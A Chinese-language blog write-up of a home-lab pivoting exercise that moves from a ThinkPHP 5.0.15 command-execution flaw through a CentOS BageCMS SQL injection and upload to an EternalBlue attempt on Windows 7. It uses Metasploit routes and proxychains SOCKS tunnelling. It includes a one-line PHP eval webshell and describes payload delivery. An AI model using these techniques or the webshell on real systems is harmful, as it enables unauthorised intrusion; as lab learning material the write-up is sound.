记一次学习--内网穿透

目录

环境搭建

两张网卡如何配置

Ubuntu配置

渗透

ubuntu的拿下

centos的拿下

探测内网环境

fscan扫描

msf上马

渗透

[拿下bage cms](#拿下bage cms)

windows的拿下

[​编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备](#编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备)

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由

​编辑


环境搭建

准备四台虚拟机

一台虚拟机模拟攻击者,一台kali

三台虚拟机模拟内网环境,一台ubuntu、一台centos、一台window7

kali:这台虚拟上有一张网卡

IP:192.168.244.129(nat)

ubuntu:这台虚拟机上有两张网卡一张是NAT模式,一张是主机模式。

IP:192.168.244.154(nat)、192.168.116.128(主机模式)

centos:这台虚拟机上也有两张网卡一张是主机模式、一张是自定义模式

IP:192.168.116.129(主机模式)、192.168.110.128(自定义模式)

window:这台虚拟机上只有一张网卡

IP:192.168.110.129(自定义模式)

两张网卡如何配置

在编辑中寻找虚拟网络编辑器

三张网卡设置不同网段,如下图

我这里设置的是VMnet8是NAT模式模拟可以访问外网的网段

VMnet1和VMnet0设置的是仅主机模式模拟内网

然后再虚拟机中设置网卡,选择不同的模式,即可完成虚拟机中两张网卡的设置

配置完成网络后kali可以ping通Ubuntu的192.168.244.154,Ubuntu可以ping通centos的192.168.116.129,centos可以ping通windows的192.168.110.129

kali ping ubuntu

ubuntu ping centos

centos ping Windows

Ubuntu配置

这台虚拟机上部署了thinkphp5.0.15的版本,我们一会要借助thinkphp5.0.15上的漏洞进行渗透

渗透

ubuntu的拿下

首先查看网站,这里是thinkphp5.0的版本,说不定会有对应的漏洞。经过查找确实有一个命令执行漏洞

执行后进行测试

执行以下命令写入文件

echo '<?php eval($_POST[123]); ?>' >web.php

然后尝试蚁剑连接,连接成功

centos的拿下

我们在Ubuntu执行ip addr,发现ubuntu有两张网卡,猜测这里说不定有内网环境

探测内网环境

现在有两种方式上马一个msf,或者上传一个fscan

fscan扫描

将对应版本的fscan下载到你蚁剑连接的目标机器上

然后加权扫描,扫描过后多出了result文件,查看result文件。发现再116网段下还有一台机器也就是我们的centos,并且该设备开放了80端口

msf上马

显示系统名、节点名称、操作系统的发行版号、操作系统版本、运行系统的机器 ID 号。

msf生成木马

用python架设一个简单的http服务器

python3 -m http.server

获取木马后,然后将木马传递到你蚁剑连接的主机上

上传成功

加权执行

攻击者kali监听

然后由于116现在是内网,所以现在kali无法访问116网段,我们需要添加一条路由才可以访问,下图是路由情况

添加路由,这里由于现在的会话连接的是ubuntu,所以现在是可以通过会话建立到达116的路由的

然后可以创建一个代理服务器

现在创建的代理是kali的1080端口,这个就相当于我们只要连接本地的1080端口就连接到了msf上面,然后就可以走到116的那个网段

在kali的proxychain中将代理设置好(目录/etc//etc/proxychains4.conf )

然后直接使用proxychains扫描80端口

扫描结果

渗透

我们这里搭建了代理服务器所以可以借助火狐来直接访问,在火狐的设置中设置代理

进入设置

进入代理设置

设置代理,这里的代理就是你在proxychain中设置的代理,你选的那个版本就要那个版本,刚刚在代理中选的是sock 4a所以这里就选4a

设置代理之后就可以访问内网网址了

拿下bage cms

我们首先看一下robots.txt文件

进入目录/index.php?r=admin,进入了cms的后台,在这里可以尝试以下密码爆破

或者密码喷撒,我这里没有尝试

这里有一个sql注入漏洞

将账户密码注入出来,登陆后台

然后审计,发现在这里可以上传文件上传以下试一下

上传成功,这里上传成功

windows的拿下

蚁剑设置代理

蚁剑连接,蚁剑连接192.168.116.129成功

查看现在蚁剑连接的192.168.116.129发现有两张网卡

使用fscan查看内网环境,发现了192.168.110.128这台设备

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

将木马发送到192.168.110.129

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由

然后刚刚用fscan扫描出来的结果说192.168.110.129是一台windows7且可能有永恒之蓝这个漏洞

msf使用永恒之蓝漏洞攻击windows7

设置攻击主机

然后exploit就可以了

我这里windows一直拒绝连接不知道为啥

后经过查询是因为Windows在内网中永恒之蓝所以payload要正向连接才可以

相关推荐
初学者7.3 分钟前
Webpack学习笔记(2)
笔记·学习·webpack
创意锦囊2 小时前
随时随地编码,高效算法学习工具—E时代IDE
ide·学习·算法
尘觉3 小时前
算法的学习笔记—扑克牌顺子(牛客JZ61)
数据结构·笔记·学习·算法
1 9 J3 小时前
Java 上机实践11(组件及事件处理)
java·开发语言·学习·算法
Blankspace学3 小时前
Wireshark软件下载安装及基础
网络·学习·测试工具·网络安全·wireshark
南宫生3 小时前
力扣-图论-70【算法学习day.70】
java·学习·算法·leetcode·图论
bohu833 小时前
sentinel学习笔记1-为什么需要服务降级
笔记·学习·sentinel·滑动窗口
HE10293 小时前
威尔克斯(Wilks)分布
学习
初学者7.4 小时前
Webpack学习笔记(3)
笔记·学习·webpack
璞~5 小时前
MQTT 课程概览 (学习笔记)02
笔记·学习